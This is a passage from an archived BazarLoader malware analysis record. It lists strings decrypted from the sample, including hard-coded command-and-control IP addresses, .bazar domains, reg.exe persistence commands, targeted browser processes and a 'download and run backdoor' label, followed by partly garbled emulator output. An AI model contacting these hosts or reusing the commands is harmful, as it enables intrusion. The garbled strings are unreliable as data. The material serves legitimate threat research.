Error code = [\r\nCan't create file in path = [\r\n]. Error code = [\r\nMD5Update\r\nCreatePipe\r\nCreatePipe() return error\r\nPeekNamedPipe\r\nSet-Cookie:\r\n/nobreak\r\n/c y /d y /t\r\n127.0.0.1\r\n /t REG_SZ /d\r\nGetDateFormatA\r\nbcdfghklmnpqrstvwxz\r\nWs2_32.dll\r\ninet_pton\r\n95.217.229.211\r\n217.160.188.24\r\n89.163.140.67\r\n185.52.0.55\r\n195.10.195.195\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\r\nContent-Type: application/x-www-form-urlencoded\r\nBcrypt.dll\r\nBCryptEnumContextFunctions\r\nTLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\nTLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\nTLS_RSA_WITH_AES_256_GCM_SHA384\r\nTLS_RSA_WITH_AES_128_GCM_SHA256\r\nTLS_RSA_WITH_AES_256_CBC_SHA256\r\nTLS_RSA_WITH_AES_128_CBC_SHA256\r\nTLS_RSA_WITH_3DES_EDE_CBC_SHA\r\nuser32.dll\r\nws2_32.dll\r\nntdll.dll\r\nshell32.dll\r\nwininet.dll\r\nurlmon.dll\r\nshlwapi.dll\r\nversion.dll\r\nole32.dll\r\na0lDGeEdIfO0g\r\nrFg6_9k8y_Sf_Gh6l7d\r\nlDF_2cSr_vT7e6r3s\r\nl1d00rG_sE3tFr1t_aGpJp\r\na09r4i67h\r\na0r3f45u7v\r\nf23k5p0r1m\r\nvSaDlRhBlEdMiRs\r\nrFg_7m3n0_sDv\r\nrDe6_mRa_9dSnFs\r\nrFeSg_4b5zKr_Qs4eDr\r\nrFgQtIr_b8aWz_Ki0\r\n185.99.133.67\r\n188.127.249.22\r\n91.201.202.138\r\nreddew28c.bazar\r\nbluehail.bazar\r\nwhitestorm9p.bazar\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\ncmd.exe /c reg.exe query\r\nchrome.exe\r\nmsedge.exe\r\nInternet Explorer\\\r\ncmd.exe /c reg.exe query\r\n\" /v \"Path\"\r\nInternet Explorer\\\r\nchrome.exe\r\nmsedge.exe\r\n SCODEF:17508 CREDAT:3\r\n --type=renderer --field-trial-handle=1140,\r\nchrome.exe\r\nmsedge.exe\r\n --instant-process --device-scale-factor=1\r\n 
--no-v8-untrusted-code-mitigations\r\n \u0026 start \"\" \"\r\n \u0026 start \"\" \"\r\nntdll.dll\r\nSetEnvironmentVariableA\r\n/absent0/offensive\r\ndownload and run backdoor\r\nyahoo.com\r\ngoogle.com\r\namazon.com\r\nmicrosoft.com\r\nmsdn.microsoft.com\r\nintel.com\r\napple.com\r\nwhitehouse.gov\r\nInitializeProcThreadAttributeList\r\nUpdateProcThreadAttribute\r\nntdll.dll\r\nNtGetContextThread\r\nNtSetContextThread\r\nNtResumeThread\r\nNtQueryInformationProcess\r\n(bytesMaskedProcess) is EMPTY\r\nDllRegisterServer\r\nGetDateFormatA\r\nGetTimeFormatA\r\nCrypt32.dll\r\nCryptDecodeObjectEx\r\nCryptDecodeObject\r\nBcrypt.dll\r\nBCryptGetProperty\r\nBCryptDestroyHash\r\nBCryptHashData\r\nBCryptSignHash\r\nBCryptImportKeyPair\r\nBCryptEncrypt\r\nBCryptDecrypt\r\n-----BEGIN RSA PRIVATE KEY-----\r\n-END RSA PRIVATE KEY\r\nRSAFULLPRIVATEBLOB\r\nBlockLength\r\nhardcoded Emercoin\r\ngenerate Emercoin\r\nI wrote an additional string decryptor using Unicorn to see if that route would be more effective. It turns out it’s a little bit\r\nmore difficult. It was still a fun exercise! 
Example output is below.\r\nundefined\r\nundefined\r\n.)$L?)2 |{v7\\FV\r\nt cr\r\nhrror code = [\r\n\u0026pdate\r\nCreatePipe\r\nPeekNamedPipe\r\n3Cookie:\r\nz6=iie:\r\n/nobreak\r\n\u003e NUL\r\nchoice\r\n/c y /d y /t\r\n\u003e NUL\r\nping\r\n127.0.0.1\r\n /t REG_SZ /d\r\nateFB\r\naeioqk\r\nWs2_32.dll\r\ninet_pton\r\nMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)\r\nBcrypt.dll\r\nBCryptEnumContextFunctions\r\nTLS_ECDHE_RSA_WITH_AES_256_CBC_SHA\r\nTLS_ECDHE_RSA_WITH_AES_128_CBC_SHA\r\nTLS_RSA_WITH_AES_256_GCM_SHA384\r\nTLS_RSA_WITH_AES_128_GCM_SHA256\r\nTLS_RSA_WITH_AES_256\r\nTLS_RSA_WITH_AES_128_CBC_SHA256\r\nTLS_RSA_WITH_3DES_EDE_CBC_SHA\r\nuser32.d?\r\nws2_32.dll\r\nntdll.dll\r\nshell32.dll\r\nwininet.dll\r\nurlmon.dll\r\nshlwapi.dll\r\nversion.dll\r\nole32.dll\r\na0lDGeEdIfO0g\r\nrFg6_9k8y_Sf_Gh6l7d\r\nlDF_2cSr_vT7e6r3s\r\nl1d00rG_sE3tFr1t_aGpJp\r\na09r4i67h\r\na0r3l\r\nf23k5p0r1m\r\nvSaDlRhBlEdMiRs\r\nrFg_7m3n0_sDv\r\nrDe6_mRa_9dSnFs\r\nrFeSg_4b5zKr_Qs4eDr\r\nrFgQtIr_b8aWz_Ki0\r\n185.99.133.67\r\n188.127.249.22\r\n91.201.202.138\r\nreddew28c.bazar\r\nbluehail.bazar\r\nwhitestorm9p.bazar\r\nDexe /c reg.exe query HKCU\\Software\\\r\n3Ceexe /c reg.exe query HKCU\\Software\\\r\ncmd.exe /c reg.exe query HKCU\\Software\\\r\n /v \"\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /f /v\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\n /f /v\r\ncmd.exe /c reg.exe add HKCU\\Software\\\r\n /t REG_BINARY /d\r\nexe\r\nzme.e\r\nrbexe\r\n \"Pa\r\nchrome.exe\r\nmsedge.exe\r\n SCODEF:17508 CREDAT:3\r\n --type=renderer --field-trial-handle=1140,\r\nchrome.exe\r\nPe-scale-factor=1 --num-raster-threads=2\r\nmsedge.exe\r\n --instant-process --device-scale-factor=1\r\n --no-v8-untrusted-code-mitigations\r\n \u0026 start \"\" \"\r\nntdl\r\nnvironme\r\n7_;B}P-7Q?W}P*Xn[Y1\r\n$IR{load and run 
backdoor\r\nyahoo.com\r\ngoogle.com\r\namazon.com\r\nmicrosoft.com\r\nmsdn.microsoft.com\r\nintel.com\r\nhp.com\r\nhpe.com\r\napple.com\r\nwhitehouse.gov\r\nInitializeProcThreadAttributeList\r\nntdll.dl\r\nNtGetContextThread\r\nNtSetContextThread\r\nNtResumeThread\r\n(byt\r\nGetDateFormatA\r\nGetTimeFormatA\r\nCrypt32.dll\r\nCryptDecodeObjectEx\r\nCryptDecodeObject\r\nBcrypt.dll\r\nBCryptGetProperty\r\nBCryptDestroyHash\r\nBCryptHashData\r\nBCryptSignHash\r\nBCryptImportKeyPair\r\nBCryptEncrypt\r\nBCryptDecrypt\r\n-----BEGIN RSA PRIVATE KEY-----\r\n-END RSA PRIVATE KEYG\r\nRSAFULLPRIVATEBLOB\r\nBlockLength\r\nSHA384\r\nSHA384\r\nhardcoded Emercoin\r\ngenerate Emercoin\r\nGetFullPathNameA\r\nt write data\r\nyu+file\r\nyu+path = [\r\nZbtdll.dll\r\nrinal\r\n/ll32.exe\r\ntimeout\r\n192.0.2.\r\n-w 1000\r\nGetFileAttributesExA\r\n%public%\r\n@n\"Y\r\nEie:\r\nBCryptFreeBuffer\r\nBCryptAddContextFunction\r\nTLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA\r\nTLS_RSA_WITH_AES_256_CBC_SHA\r\nTLS_RSA_WITH_AES_128_CBC_SHA\r\n.dll\r\nadvapi32.dll\r\nnss3.dll\r\n_x64\r\nl3dGr_uWs_p9m55s\r\nm4s5c33p\r\na98h0i3s\r\na11m987w\r\n.exe\r\n5.255.103.36\r\n /f\r\n/vr32.exe\r\nsvch\r\nsvch/\r\nel32.dll\r\n|ll32\r\nlive.com(\r\neset.com\r\nfortinet.com\r\nvanguard.com\r\nkernel32.dll\r\nkernel32.dll\r\nBCryptCreateHash\r\nBCryptFinishHash\r\nBCryptDestroyKey\r\nhardcoded IP\r\nSource: https://malwarebookreports.com/bazarloader-back-from-holiday-break/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://malwarebookreports.com/bazarloader-back-from-holiday-break/"
	],
	"report_names": [
		"bazarloader-back-from-holiday-break"
	],
	"threat_actors": [],
	"ts_created_at": 1775434923,
	"ts_updated_at": 1775791333,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/217f4616d960481d37a3497d97c4bda5a5bff598.pdf",
		"text": "https://archive.orkl.eu/217f4616d960481d37a3497d97c4bda5a5bff598.txt",
		"img": "https://archive.orkl.eu/217f4616d960481d37a3497d97c4bda5a5bff598.jpg"
	}
}